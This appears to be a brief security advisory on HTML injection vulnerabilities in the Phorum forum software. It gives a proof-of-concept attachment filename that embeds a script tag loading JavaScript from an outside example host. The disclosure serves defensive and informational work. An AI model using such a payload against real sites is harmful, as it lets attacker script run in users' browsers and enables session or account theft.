|
Phorum Multiple Subject and Attachment HTML Injection Vulnerabilities
No exploit is required. The following proof of concept demonstrates a filename suitable for an attachment: test<script language='Javascript' src='http:&#47;&#47;www.example.com&#47;test.js'>.txt |
|
|
Privacy Statement |